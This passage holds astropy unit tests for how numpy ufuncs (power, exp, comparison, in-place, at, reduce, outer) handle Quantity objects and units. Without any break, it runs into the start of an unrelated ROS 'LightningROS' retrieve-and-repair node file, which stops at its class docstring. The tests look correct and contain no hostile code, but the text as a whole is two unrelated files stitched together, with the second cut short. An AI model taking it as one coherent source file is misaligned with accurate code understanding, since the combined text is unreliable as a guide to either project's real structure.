        assert_allclose(remainder.value, [0.0094, 0.0696, 0.079])
        assert remainder.unit == dividend.unit
        # The explicit ufuncs must agree with the operators.
        quotient2 = np.floor_divide(dividend, divisor)
        remainder2 = np.remainder(dividend, divisor)
        assert np.all(quotient2 == quotient)
        assert np.all(remainder2 == remainder)
        quotient3, remainder3 = divmod(dividend, divisor)
        assert np.all(quotient3 == quotient)
        assert np.all(remainder3 == remainder)

        # A bare unit (not a Quantity) is not a valid operand.
        with pytest.raises(TypeError):
            divmod(dividend, u.km)

        with pytest.raises(TypeError):
            dividend // u.km

        with pytest.raises(TypeError):
            dividend % u.km

        if hasattr(np, 'divmod'):  # not NUMPY_LT_1_13
            quotient4, remainder4 = np.divmod(dividend, divisor)
            assert np.all(quotient4 == quotient)
            assert np.all(remainder4 == remainder)
            with pytest.raises(TypeError):
                np.divmod(dividend, u.km)

    def test_sqrt_scalar(self):
        assert np.sqrt(4. * u.m) == 2. * u.m ** 0.5

    def test_sqrt_array(self):
        assert np.all(np.sqrt(np.array([1., 4., 9.]) * u.m)
                      == np.array([1., 2., 3.]) * u.m ** 0.5)

    def test_square_scalar(self):
        assert np.square(4. * u.m) == 16. * u.m ** 2

    def test_square_array(self):
        assert np.all(np.square(np.array([1., 2., 3.]) * u.m)
                      == np.array([1., 4., 9.]) * u.m ** 2)

    def test_reciprocal_scalar(self):
        assert np.reciprocal(4. * u.m) == 0.25 / u.m

    def test_reciprocal_array(self):
        assert np.all(np.reciprocal(np.array([1., 2., 4.]) * u.m)
                      == np.array([1., 0.5, 0.25]) / u.m)

    # heaviside only introduced in numpy 1.13
    @pytest.mark.skipif("not hasattr(np, 'heaviside')")
    def test_heaviside_scalar(self):
        # The second argument (value at zero) may itself be a
        # dimensionless Quantity.
        assert np.heaviside(0. * u.m, 0.5) == 0.5 * u.dimensionless_unscaled
        assert np.heaviside(0. * u.s,
                            25 * u.percent) == 0.25 * u.dimensionless_unscaled
        assert np.heaviside(2. * u.J, 0.25) == 1. * u.dimensionless_unscaled

    @pytest.mark.skipif("not hasattr(np, 'heaviside')")
    def test_heaviside_array(self):
        values = np.array([-1., 0., 0., +1.])
        halfway = np.array([0.75, 0.25, 0.75, 0.25]) * u.dimensionless_unscaled
        assert np.all(np.heaviside(values * u.m,
                                   halfway * u.dimensionless_unscaled) ==
                      [0, 0.25, 0.75, +1.] * u.dimensionless_unscaled)

    # cbrt only introduced in numpy 1.10
    @pytest.mark.skipif("not hasattr(np, 'cbrt')")
    def test_cbrt_scalar(self):
        assert np.cbrt(8. * u.m**3) == 2. * u.m

    @pytest.mark.skipif("not hasattr(np, 'cbrt')")
    def test_cbrt_array(self):
        # Calculate cbrt on both sides since on Windows the cube root of 64
        # does not exactly equal 4.  See issue #4388.
        values = np.array([1., 8., 64.])
        assert np.all(np.cbrt(values * u.m**3) ==
                      np.cbrt(values) * u.m)

    def test_power_scalar(self):
        assert np.power(4. * u.m, 2.) == 16. * u.m ** 2
        assert np.power(4., 200. * u.cm / u.m) == \
            u.Quantity(16., u.dimensionless_unscaled)
        # regression check on #1696
        assert np.power(4. * u.m, 0.) == 1. * u.dimensionless_unscaled

    def test_power_array(self):
        assert np.all(np.power(np.array([1., 2., 3.]) * u.m, 3.)
                      == np.array([1., 8., 27.]) * u.m ** 3)
        # regression check on #1696
        assert np.all(np.power(np.arange(4.) * u.m, 0.) ==
                      1. * u.dimensionless_unscaled)

    # float_power only introduced in numpy 1.12
    @pytest.mark.skipif("not hasattr(np, 'float_power')")
    def test_float_power_array(self):
        assert np.all(np.float_power(np.array([1., 2., 3.]) * u.m, 3.)
                      == np.array([1., 8., 27.]) * u.m ** 3)
        # regression check on #1696
        assert np.all(np.float_power(np.arange(4.) * u.m, 0.) ==
                      1. * u.dimensionless_unscaled)

    # An array exponent on a dimensional base is ambiguous (each element
    # would get a different unit), hence must raise.
    @raises(ValueError)
    def test_power_array_array(self):
        np.power(4. * u.m, [2., 4.])

    @raises(ValueError)
    def test_power_array_array2(self):
        np.power([2., 4.] * u.m, [2., 4.])

    def test_power_array_array3(self):
        # Identical unit fractions are converted automatically to dimensionless
        # and should be allowed as base for np.power: #4764
        q = [2., 4.] * u.m / u.m
        powers = [2., 4.]
        res = np.power(q, powers)
        assert np.all(res.value == q.value ** powers)
        assert res.unit == u.dimensionless_unscaled
        # The same holds for unit fractions that are scaled dimensionless.
        q2 = [2., 4.] * u.m / u.cm
        # Test also against different types of exponent
        for cls in (list, tuple, np.array, np.ma.array, u.Quantity):
            res2 = np.power(q2, cls(powers))
            assert np.all(res2.value == q2.to_value(1) ** powers)
            assert res2.unit == u.dimensionless_unscaled
        # Though for single powers, we keep the composite unit.
        res3 = q2 ** 2
        assert np.all(res3.value == q2.value ** 2)
        assert res3.unit == q2.unit ** 2
        assert np.all(res3 == q2 ** [2, 2])

    def test_power_invalid(self):
        with pytest.raises(TypeError) as exc:
            np.power(3., 4. * u.m)
        assert "raise something to a dimensionless" in exc.value.args[0]

    def test_copysign_scalar(self):
        # Only the sign of the second argument matters; its unit is ignored.
        assert np.copysign(3 * u.m, 1.) == 3. * u.m
        assert np.copysign(3 * u.m, 1. * u.s) == 3. * u.m
        assert np.copysign(3 * u.m, -1.) == -3. * u.m
        assert np.copysign(3 * u.m, -1. * u.s) == -3. * u.m

    def test_copysign_array(self):
        assert np.all(np.copysign(np.array([1., 2., 3.]) * u.s, -1.) == -np.array([1., 2., 3.]) * u.s)
        assert np.all(np.copysign(np.array([1., 2., 3.]) * u.s, -1. * u.m) == -np.array([1., 2., 3.]) * u.s)
        assert np.all(np.copysign(np.array([1., 2., 3.]) * u.s, np.array([-2., 2., -4.]) * u.m) == np.array([-1., 2., -3.]) * u.s)

        # A plain-array first argument stays a plain array.
        q = np.copysign(np.array([1., 2., 3.]), -3 * u.m)
        assert np.all(q == np.array([-1., -2., -3.]))
        assert not isinstance(q, u.Quantity)

    def test_ldexp_scalar(self):
        assert np.ldexp(4. * u.m, 2) == 16. * u.m

    def test_ldexp_array(self):
        assert np.all(np.ldexp(np.array([1., 2., 3.]) * u.m, [3, 2, 1])
                      == np.array([8., 8., 6.]) * u.m)

    def test_ldexp_invalid(self):
        # The exponent must be an integer, and may not carry a unit.
        with pytest.raises(TypeError):
            np.ldexp(3. * u.m, 4.)

        with pytest.raises(TypeError):
            np.ldexp(3., u.Quantity(4, u.m, dtype=int))

    @pytest.mark.parametrize('function', (np.exp, np.expm1, np.exp2,
                                          np.log, np.log2, np.log10, np.log1p))
    def test_exp_scalar(self, function):
        q = function(3. * u.m / (6. * u.m))
        assert q.unit == u.dimensionless_unscaled
        assert q.value == function(0.5)

    @pytest.mark.parametrize('function', (np.exp, np.expm1, np.exp2,
                                          np.log, np.log2, np.log10, np.log1p))
    def test_exp_array(self, function):
        q = function(np.array([2., 3., 6.]) * u.m / (6. * u.m))
        assert q.unit == u.dimensionless_unscaled
        assert np.all(q.value
                      == function(np.array([1. / 3., 1. / 2., 1.])))
        # should also work on quantities that can be made dimensionless
        q2 = function(np.array([2., 3., 6.]) * u.m / (6. * u.cm))
        assert q2.unit == u.dimensionless_unscaled
        assert_allclose(q2.value,
                        function(np.array([100. / 3., 100. / 2., 100.])))

    @pytest.mark.parametrize('function', (np.exp, np.expm1, np.exp2,
                                          np.log, np.log2, np.log10, np.log1p))
    def test_exp_invalid_units(self, function):
        # Can't use exp() and friends with non-dimensionless quantities
        with pytest.raises(TypeError) as exc:
            function(3. * u.m / u.s)
        assert exc.value.args[0] == ("Can only apply '{0}' function to "
                                     "dimensionless quantities"
                                     .format(function.__name__))

    def test_modf_scalar(self):
        q = np.modf(9. * u.m / (600. * u.cm))
        assert q == (0.5 * u.dimensionless_unscaled,
                     1. * u.dimensionless_unscaled)

    def test_modf_array(self):
        v = np.arange(10.) * u.m / (500. * u.cm)
        q = np.modf(v)
        # Compare against modf applied to the equivalent bare array.
        n = np.modf(v.to_value(u.dimensionless_unscaled))
        assert q[0].unit == u.dimensionless_unscaled
        assert q[1].unit == u.dimensionless_unscaled
        assert all(q[0].value == n[0])
        assert all(q[1].value == n[1])

    def test_frexp_scalar(self):
        q = np.frexp(3. * u.m / (6. * u.m))
        assert q == (np.array(0.5), np.array(0.0))

    def test_frexp_array(self):
        q = np.frexp(np.array([2., 3., 6.]) * u.m / (6. * u.m))
        assert all((_q0, _q1) == np.frexp(_d) for _q0, _q1, _d
                   in zip(q[0], q[1], [1. / 3., 1. / 2., 1.]))

    def test_frexp_invalid_units(self):
        # Can't use frexp() with non-dimensionless quantities
        with pytest.raises(TypeError) as exc:
            np.frexp(3. * u.m / u.s)
        assert exc.value.args[0] == ("Can only apply 'frexp' function to "
                                     "unscaled dimensionless quantities")

        # also does not work on quantities that can be made dimensionless
        with pytest.raises(TypeError) as exc:
            np.frexp(np.array([2., 3., 6.]) * u.m / (6. * u.cm))
        assert exc.value.args[0] == ("Can only apply 'frexp' function to "
                                     "unscaled dimensionless quantities")

    @pytest.mark.parametrize('function', (np.logaddexp, np.logaddexp2))
    def test_dimensionless_twoarg_array(self, function):
        q = function(np.array([2., 3., 6.]) * u.m / (6. * u.cm), 1.)
        assert q.unit == u.dimensionless_unscaled
        assert_allclose(q.value,
                        function(np.array([100. / 3., 100. / 2., 100.]), 1.))

    @pytest.mark.parametrize('function', (np.logaddexp, np.logaddexp2))
    def test_dimensionless_twoarg_invalid_units(self, function):
        # Both arguments must be (convertible to) dimensionless.
        with pytest.raises(TypeError) as exc:
            function(1. * u.km / u.s, 3. * u.m / u.s)
        assert exc.value.args[0] == ("Can only apply '{0}' function to "
                                     "dimensionless quantities"
                                     .format(function.__name__))


class TestInvariantUfuncs(object):
    """Test ufuncs that should leave the unit of a Quantity unchanged."""

    # np.positive was only added in numpy 1.13.
    # NOTE: the conditional list must be parenthesized.  ``+`` binds more
    # tightly than the ``if``/``else`` conditional expression, so without
    # parentheses the whole parameter list evaluated to ``[]`` on numpy
    # < 1.13 and every scalar-invariance test was silently skipped.
    @pytest.mark.parametrize(('ufunc'), [np.absolute, np.fabs,
                                         np.conj, np.conjugate,
                                         np.negative, np.spacing, np.rint,
                                         np.floor, np.ceil] +
                             ([np.positive] if hasattr(np, 'positive')
                              else []))
    def test_invariant_scalar(self, ufunc):
        # Scalar in, scalar out: unit and value behave independently.
        q_i = 4.7 * u.m
        q_o = ufunc(q_i)
        assert isinstance(q_o, u.Quantity)
        assert q_o.unit == q_i.unit
        assert q_o.value == ufunc(q_i.value)

    @pytest.mark.parametrize(('ufunc'), [np.absolute, np.conjugate,
                                         np.negative, np.rint,
                                         np.floor, np.ceil])
    def test_invariant_array(self, ufunc):
        # Same as above for array-valued quantities.
        q_i = np.array([-3.3, 2.1, 10.2]) * u.kg / u.s
        q_o = ufunc(q_i)
        assert isinstance(q_o, u.Quantity)
        assert q_o.unit == q_i.unit
        assert np.all(q_o.value == ufunc(q_i.value))

    @pytest.mark.parametrize(('ufunc'), [np.add, np.subtract, np.hypot,
                                         np.maximum, np.minimum, np.nextafter,
                                         np.remainder, np.mod, np.fmod])
    def test_invariant_twoarg_scalar(self, ufunc):
        # The second operand is converted to the first operand's unit.
        q_i1 = 4.7 * u.m
        q_i2 = 9.4 * u.km
        q_o = ufunc(q_i1, q_i2)
        assert isinstance(q_o, u.Quantity)
        assert q_o.unit == q_i1.unit
        assert_allclose(q_o.value, ufunc(q_i1.value, q_i2.to_value(q_i1.unit)))

    @pytest.mark.parametrize(('ufunc'), [np.add, np.subtract, np.hypot,
                                         np.maximum, np.minimum, np.nextafter,
                                         np.remainder, np.mod, np.fmod])
    def test_invariant_twoarg_array(self, ufunc):
        # Array version of the two-argument invariance check.
        q_i1 = np.array([-3.3, 2.1, 10.2]) * u.kg / u.s
        q_i2 = np.array([10., -5., 1.e6]) * u.g / u.us
        q_o = ufunc(q_i1, q_i2)
        assert isinstance(q_o, u.Quantity)
        assert q_o.unit == q_i1.unit
        assert_allclose(q_o.value, ufunc(q_i1.value, q_i2.to_value(q_i1.unit)))

    @pytest.mark.parametrize(('ufunc'), [np.add, np.subtract, np.hypot,
                                         np.maximum, np.minimum, np.nextafter,
                                         np.remainder, np.mod, np.fmod])
    def test_invariant_twoarg_one_arbitrary(self, ufunc):
        # A bare zero array may combine with any unit.
        q_i1 = np.array([-3.3, 2.1, 10.2]) * u.kg / u.s
        arbitrary_unit_value = np.array([0.])
        q_o = ufunc(q_i1, arbitrary_unit_value)
        assert isinstance(q_o, u.Quantity)
        assert q_o.unit == q_i1.unit
        assert_allclose(q_o.value, ufunc(q_i1.value, arbitrary_unit_value))

    @pytest.mark.parametrize(('ufunc'), [np.add, np.subtract, np.hypot,
                                         np.maximum, np.minimum, np.nextafter,
                                         np.remainder, np.mod, np.fmod])
    def test_invariant_twoarg_invalid_units(self, ufunc):
        # Incompatible units must raise UnitsError.
        q_i1 = 4.7 * u.m
        q_i2 = 9.4 * u.s
        with pytest.raises(u.UnitsError) as exc:
            ufunc(q_i1, q_i2)
        assert "compatible dimensions" in exc.value.args[0]


class TestComparisonUfuncs(object):
    """Comparison ufuncs convert to a common unit and return plain bool arrays."""

    @pytest.mark.parametrize(('ufunc'), [np.greater, np.greater_equal,
                                         np.less, np.less_equal,
                                         np.not_equal, np.equal])
    def test_comparison_valid_units(self, ufunc):
        left = np.array([-3.3, 2.1, 10.2]) * u.kg / u.s
        right = np.array([10., -5., 1.e6]) * u.g / u.Ms
        # The result is a bare boolean ndarray, not a Quantity.
        result = ufunc(left, right)
        assert not isinstance(result, u.Quantity)
        assert result.dtype == np.bool
        expected = ufunc(left.value, right.to_value(left.unit))
        assert np.all(result == expected)
        # A dimensionless quantity can be compared against a plain number.
        ratio = left / right
        result2 = ufunc(ratio, 2.)
        assert not isinstance(result2, u.Quantity)
        assert result2.dtype == np.bool
        expected2 = ufunc(ratio.to_value(u.dimensionless_unscaled), 2.)
        assert np.all(result2 == expected2)
        # comparison with 0., inf, nan is OK even for dimensional quantities
        for special in (0., np.inf, np.nan):
            ufunc(left, special)
            ufunc(left, special * np.ones(len(left)))
        # and just for completeness
        ufunc(left, np.array([0., np.inf, np.nan]))

    @pytest.mark.parametrize(('ufunc'), [np.greater, np.greater_equal,
                                         np.less, np.less_equal,
                                         np.not_equal, np.equal])
    def test_comparison_invalid_units(self, ufunc):
        # Comparing incompatible units must raise UnitsError.
        length = 4.7 * u.m
        duration = 9.4 * u.s
        with pytest.raises(u.UnitsError) as exc:
            ufunc(length, duration)
        assert "compatible dimensions" in exc.value.args[0]


class TestInplaceUfuncs(object):
    """Test ufuncs that write their result into a Quantity via ``out=``.

    The checks below verify that the output object is reused (identity is
    preserved), that its unit is updated to the result's unit, and that
    dtype casting rules are respected.
    """

    @pytest.mark.parametrize(('value'), [1., np.arange(10.)])
    def test_one_argument_ufunc_inplace(self, value):
        # without scaling
        s = value * u.rad
        check = s
        np.sin(s, out=s)
        assert check is s
        assert check.unit == u.dimensionless_unscaled
        # with scaling
        s2 = (value * u.rad).to(u.deg)
        check2 = s2
        np.sin(s2, out=s2)
        assert check2 is s2
        assert check2.unit == u.dimensionless_unscaled
        # Both paths must give the same numerical result.
        assert_allclose(s.value, s2.value)

    @pytest.mark.parametrize(('value'), [1., np.arange(10.)])
    def test_one_argument_ufunc_inplace_2(self, value):
        """Check inplace works with non-quantity input and quantity output"""
        s = value * u.m
        check = s
        # The output quantity's original unit (m) is overwritten by the
        # result's unit in each case.
        np.absolute(value, out=s)
        assert check is s
        assert np.all(check.value == np.absolute(value))
        assert check.unit is u.dimensionless_unscaled
        np.sqrt(value, out=s)
        assert check is s
        assert np.all(check.value == np.sqrt(value))
        assert check.unit is u.dimensionless_unscaled
        np.exp(value, out=s)
        assert check is s
        assert np.all(check.value == np.exp(value))
        assert check.unit is u.dimensionless_unscaled
        np.arcsin(value/10., out=s)
        assert check is s
        assert np.all(check.value == np.arcsin(value/10.))
        assert check.unit is u.radian

    @pytest.mark.parametrize(('value'), [1., np.arange(10.)])
    def test_one_argument_two_output_ufunc_inplace(self, value):
        v = 100. * value * u.cm / u.m
        v_copy = v.copy()
        tmp = v.copy()
        check = v
        np.modf(v, tmp, v)  # cannot use out1,out2 keywords with numpy 1.7
        assert check is v
        assert check.unit == u.dimensionless_unscaled
        v2 = v_copy.to(u.dimensionless_unscaled)
        check2 = v2
        np.modf(v2, tmp, v2)
        assert check2 is v2
        assert check2.unit == u.dimensionless_unscaled
        # can also replace in last position if no scaling is needed
        v3 = v_copy.to(u.dimensionless_unscaled)
        check3 = v3
        np.modf(v3, v3, tmp)
        assert check3 is v3
        assert check3.unit == u.dimensionless_unscaled
        # in np<1.13, without __array_ufunc__, one cannot replace input with
        # first output when scaling
        v4 = v_copy.copy()
        if NUMPY_LT_1_13:
            with pytest.raises(TypeError):
                np.modf(v4, v4, tmp)
        else:
            check4 = v4
            np.modf(v4, v4, tmp)
            assert check4 is v4
            assert check4.unit == u.dimensionless_unscaled

    @pytest.mark.parametrize(('value'), [1., np.arange(10.)])
    def test_two_argument_ufunc_inplace_1(self, value):
        # In-place arithmetic operators should also reuse the object while
        # updating its unit.
        s = value * u.cycle
        check = s
        s /= 2.
        assert check is s
        assert np.all(check.value == value / 2.)
        s /= u.s
        assert check is s
        assert check.unit == u.cycle / u.s
        s *= 2. * u.s
        assert check is s
        assert np.all(check == value * u.cycle)

    @pytest.mark.parametrize(('value'), [1., np.arange(10.)])
    def test_two_argument_ufunc_inplace_2(self, value):
        s = value * u.cycle
        check = s
        np.arctan2(s, s, out=s)
        assert check is s
        assert check.unit == u.radian
        # A failed in-place operation must leave the object intact.
        with pytest.raises(u.UnitsError):
            s += 1. * u.m
        assert check is s
        assert check.unit == u.radian
        np.arctan2(1. * u.deg, s, out=s)
        assert check is s
        assert check.unit == u.radian
        np.add(1. * u.deg, s, out=s)
        assert check is s
        assert check.unit == u.deg
        np.multiply(2. / u.s, s, out=s)
        assert check is s
        assert check.unit == u.deg / u.s

    def test_two_argument_ufunc_inplace_3(self):
        s = np.array([1., 2., 3.]) * u.dimensionless_unscaled
        np.add(np.array([1., 2., 3.]), np.array([1., 2., 3.]) * 2., out=s)
        assert np.all(s.value == np.array([3., 6., 9.]))
        assert s.unit is u.dimensionless_unscaled
        np.arctan2(np.array([1., 2., 3.]), np.array([1., 2., 3.]) * 2., out=s)
        assert_allclose(s.value, np.arctan2(1., 2.))
        assert s.unit is u.radian

    @pytest.mark.skipif(NUMPY_LT_1_13, reason="numpy >=1.13 required.")
    @pytest.mark.parametrize(('value'), [1., np.arange(10.)])
    def test_two_argument_two_output_ufunc_inplace(self, value):
        # divmod with outputs aliased to either input position.
        v = value * u.m
        divisor = 70.*u.cm
        v1 = v.copy()
        tmp = v.copy()
        check = np.divmod(v1, divisor, out=(tmp, v1))
        assert check[0] is tmp and check[1] is v1
        assert tmp.unit == u.dimensionless_unscaled
        assert v1.unit == v.unit
        v2 = v.copy()
        check2 = np.divmod(v2, divisor, out=(v2, tmp))
        assert check2[0] is v2 and check2[1] is tmp
        assert v2.unit == u.dimensionless_unscaled
        assert tmp.unit == v.unit
        v3a = v.copy()
        v3b = v.copy()
        check3 = np.divmod(v3a, divisor, out=(v3a, v3b))
        assert check3[0] is v3a and check3[1] is v3b
        assert v3a.unit == u.dimensionless_unscaled
        assert v3b.unit == v.unit

    def test_ufunc_inplace_non_contiguous_data(self):
        # ensure inplace works also for non-contiguous data (closes #1834)
        s = np.arange(10.) * u.m
        s_copy = s.copy()
        s2 = s[::2]
        s2 += 1. * u.cm
        assert np.all(s[::2] > s_copy[::2])
        assert np.all(s[1::2] == s_copy[1::2])

    def test_ufunc_inplace_non_standard_dtype(self):
        """Check that inplace operations check properly for casting.

        First two tests that check that float32 is kept close #3976.
        """
        a1 = u.Quantity([1, 2, 3, 4], u.m, dtype=np.float32)
        a1 *= np.float32(10)
        assert a1.unit is u.m
        assert a1.dtype == np.float32
        a2 = u.Quantity([1, 2, 3, 4], u.m, dtype=np.float32)
        a2 += (20.*u.km)
        assert a2.unit is u.m
        assert a2.dtype == np.float32
        # For integer, in-place only works if no conversion is done.
        a3 = u.Quantity([1, 2, 3, 4], u.m, dtype=np.int32)
        a3 += u.Quantity(10, u.m, dtype=np.int64)
        assert a3.unit is u.m
        assert a3.dtype == np.int32
        a4 = u.Quantity([1, 2, 3, 4], u.m, dtype=np.int32)
        with pytest.raises(TypeError):
            a4 += u.Quantity(10, u.mm, dtype=np.int64)


@pytest.mark.xfail("NUMPY_LT_1_13")
class TestUfuncAt(object):
    """Test that 'at' method for ufuncs (calculates in-place at given indices)

    For Quantities, since calculations are in-place, it makes sense only
    if the result is still a quantity, and if the unit does not have to change
    """

    def test_one_argument_ufunc_at(self):
        q = np.arange(10.) * u.m
        i = np.array([1, 2])
        # Apply the same operation to a bare copy of the values as the
        # reference result.
        qv = q.value.copy()
        np.negative.at(q, i)
        np.negative.at(qv, i)
        assert np.all(q.value == qv)
        assert q.unit is u.m

        # cannot change from quantity to bool array
        with pytest.raises(TypeError):
            np.isfinite.at(q, i)

        # for selective in-place, cannot change the unit
        with pytest.raises(u.UnitsError):
            np.square.at(q, i)

        # except if the unit does not change (i.e., dimensionless)
        d = np.arange(10.) * u.dimensionless_unscaled
        dv = d.value.copy()
        np.square.at(d, i)
        np.square.at(dv, i)
        assert np.all(d.value == dv)
        assert d.unit is u.dimensionless_unscaled

        d = np.arange(10.) * u.dimensionless_unscaled
        dv = d.value.copy()
        np.log.at(d, i)
        np.log.at(dv, i)
        assert np.all(d.value == dv)
        assert d.unit is u.dimensionless_unscaled

        # also for sine it doesn't work, even if given an angle
        a = np.arange(10.) * u.radian
        with pytest.raises(u.UnitsError):
            np.sin.at(a, i)

        # except, for consistency, if we have made radian equivalent to
        # dimensionless (though hopefully it will never be needed)
        av = a.value.copy()
        with u.add_enabled_equivalencies(u.dimensionless_angles()):
            np.sin.at(a, i)
            np.sin.at(av, i)
            assert_allclose(a.value, av)

            # but we won't do double conversion
            ad = np.arange(10.) * u.degree
            with pytest.raises(u.UnitsError):
                np.sin.at(ad, i)

    def test_two_argument_ufunc_at(self):
        s = np.arange(10.) * u.m
        i = np.array([1, 2])
        check = s.value.copy()
        # The km operand is converted to m before being added in place.
        np.add.at(s, i, 1.*u.km)
        np.add.at(check, i, 1000.)
        assert np.all(s.value == check)
        assert s.unit is u.m

        with pytest.raises(u.UnitsError):
            np.add.at(s, i, 1.*u.s)

        # also raise UnitsError if unit would have to be changed
        with pytest.raises(u.UnitsError):
            np.multiply.at(s, i, 1*u.s)

        # but be fine if it does not
        s = np.arange(10.) * u.m
        check = s.value.copy()
        np.multiply.at(s, i, 2.*u.dimensionless_unscaled)
        np.multiply.at(check, i, 2)
        assert np.all(s.value == check)
        s = np.arange(10.) * u.m
        np.multiply.at(s, i, 2.)
        assert np.all(s.value == check)

        # of course cannot change class of data either
        with pytest.raises(TypeError):
            np.greater.at(s, i, 1.*u.km)


@pytest.mark.xfail("NUMPY_LT_1_13")
class TestUfuncReduceReduceatAccumulate(object):
    """Test 'reduce', 'reduceat' and 'accumulate' methods for ufuncs

    For Quantities, it makes sense only if the unit does not have to change
    """

    def test_one_argument_ufunc_reduce_accumulate(self):
        # one argument cannot be used
        s = np.arange(10.) * u.radian
        i = np.array([0, 5, 1, 6])
        with pytest.raises(ValueError):
            np.sin.reduce(s)
        with pytest.raises(ValueError):
            np.sin.accumulate(s)
        with pytest.raises(ValueError):
            np.sin.reduceat(s, i)

    def test_two_argument_ufunc_reduce_accumulate(self):
        s = np.arange(10.) * u.m
        i = np.array([0, 5, 1, 6])
        # Mirror every operation on a bare copy of the values as the
        # reference result.
        check = s.value.copy()
        s_add_reduce = np.add.reduce(s)
        check_add_reduce = np.add.reduce(check)
        assert s_add_reduce.value == check_add_reduce
        assert s_add_reduce.unit is u.m

        s_add_accumulate = np.add.accumulate(s)
        check_add_accumulate = np.add.accumulate(check)
        assert np.all(s_add_accumulate.value == check_add_accumulate)
        assert s_add_accumulate.unit is u.m

        s_add_reduceat = np.add.reduceat(s, i)
        check_add_reduceat = np.add.reduceat(check, i)
        assert np.all(s_add_reduceat.value == check_add_reduceat)
        assert s_add_reduceat.unit is u.m

        # reduce(at) or accumulate on comparisons makes no sense,
        # as intermediate result is not even a Quantity
        with pytest.raises(TypeError):
            np.greater.reduce(s)

        with pytest.raises(TypeError):
            np.greater.accumulate(s)

        with pytest.raises(TypeError):
            np.greater.reduceat(s, i)

        # raise UnitsError if unit would have to be changed
        with pytest.raises(u.UnitsError):
            np.multiply.reduce(s)

        with pytest.raises(u.UnitsError):
            np.multiply.accumulate(s)

        with pytest.raises(u.UnitsError):
            np.multiply.reduceat(s, i)

        # but be fine if it does not
        s = np.arange(10.) * u.dimensionless_unscaled
        check = s.value.copy()
        s_multiply_reduce = np.multiply.reduce(s)
        check_multiply_reduce = np.multiply.reduce(check)
        assert s_multiply_reduce.value == check_multiply_reduce
        assert s_multiply_reduce.unit is u.dimensionless_unscaled
        s_multiply_accumulate = np.multiply.accumulate(s)
        check_multiply_accumulate = np.multiply.accumulate(check)
        assert np.all(s_multiply_accumulate.value == check_multiply_accumulate)
        assert s_multiply_accumulate.unit is u.dimensionless_unscaled
        s_multiply_reduceat = np.multiply.reduceat(s, i)
        check_multiply_reduceat = np.multiply.reduceat(check, i)
        assert np.all(s_multiply_reduceat.value == check_multiply_reduceat)
        assert s_multiply_reduceat.unit is u.dimensionless_unscaled


@pytest.mark.xfail("NUMPY_LT_1_13")
class TestUfuncOuter(object):
    """Test 'outer' methods for ufuncs

    Just a few spot checks, since it uses the same code as the regular
    ufunc call
    """

    def test_one_argument_ufunc_outer(self):
        # outer needs two operands, so a one-argument ufunc must fail
        angles = np.arange(10.) * u.radian
        with pytest.raises(ValueError):
            np.sin.outer(angles)

    def test_two_argument_ufunc_outer(self):
        lengths = np.arange(10.) * u.m
        times = np.arange(2.) * u.s
        raw_lengths = lengths.value
        raw_times = times.value
        # Units multiply just like in an ordinary ufunc call.
        product = np.multiply.outer(lengths, times)
        expected = np.multiply.outer(raw_lengths, raw_times)
        assert np.all(product.value == expected)
        assert product.unit == lengths.unit * times.unit

        # raise UnitsError if appropriate
        with pytest.raises(u.UnitsError):
            np.add.outer(lengths, times)

        # but be fine if it does not
        more_lengths = np.arange(2.) * lengths.unit
        raw_more = more_lengths.value
        total = np.add.outer(lengths, more_lengths)
        assert np.all(total.value == np.add.outer(raw_lengths, raw_more))
        assert total.unit is lengths.unit

        # Comparisons drop the Quantity class entirely.
        mask = np.greater.outer(lengths, more_lengths)
        assert type(mask) is np.ndarray
        assert np.all(mask == np.greater.outer(raw_lengths, raw_more))

#!/usr/bin/env python
"""
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, University of California, Berkeley
# All rights reserved.
# Authors: Cameron Lee (cameronlee@berkeley.edu) and
# Dmitry Berenson (berenson@eecs.berkeley.edu)
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
#  * Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
#  * Redistributions in binary form must reproduce the above
#    copyright notice, this list of conditions and the following
#    disclaimer in the documentation and/or other materials provided
#    with the distribution.
#  * Neither the name of University of California, Berkeley nor the names
#    of its contributors may be used to endorse or promote products derived
#    from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""

"""
This node advertises an action which is used by the main lightning node
(see run_lightning.py) to run the Retrieve and Repair portion of LightningROS.
This node relies on a planner_stoppable type node to repair the paths, the
PathTools library to retrieve paths from the library (this is not a separate
node; just a python library that it calls), and the PathTools python library
which calls the collision_checker service and advertises a topic for displaying
stuff in RViz.
"""

import roslib
import rospy
import actionlib
import threading

from tools.PathTools import PlanTrajectoryWrapper, InvalidSectionWrapper, DrawPointsWrapper
from pathlib.PathLibrary import *
from lightning.msg import Float64Array, RRAction, RRResult
from lightning.msg import StopPlanning, RRStats
from lightning.srv import ManagePathLibrary, ManagePathLibraryResponse

import sys
import pickle
import time

# Name of this node.
RR_NODE_NAME = "rr_node"
# Name to use for stopping the repair planner. Published from this node.
STOP_PLANNER_NAME = "stop_rr_planning"
# Topic to subscribe to for stopping the whole node in the middle of processing.
STOP_RR_NAME = "stop_all_rr"
# Name of library managing service run from this node.
MANAGE_LIBRARY = "manage_path_library"
# States of the retrieve/repair/return state machine in _retrieve_repair().
# The original tuple bound STATE_FINISHED twice (copy/paste slip), silently
# discarding one value; there are exactly four states.
STATE_RETRIEVE, STATE_REPAIR, STATE_RETURN_PATH, STATE_FINISHED = (0, 1, 2, 3)

class RRNode:
    """
    Action server which runs the Retrieve and Repair portion of LightningROS:
    retrieves a candidate path from the path library, collision-checks it,
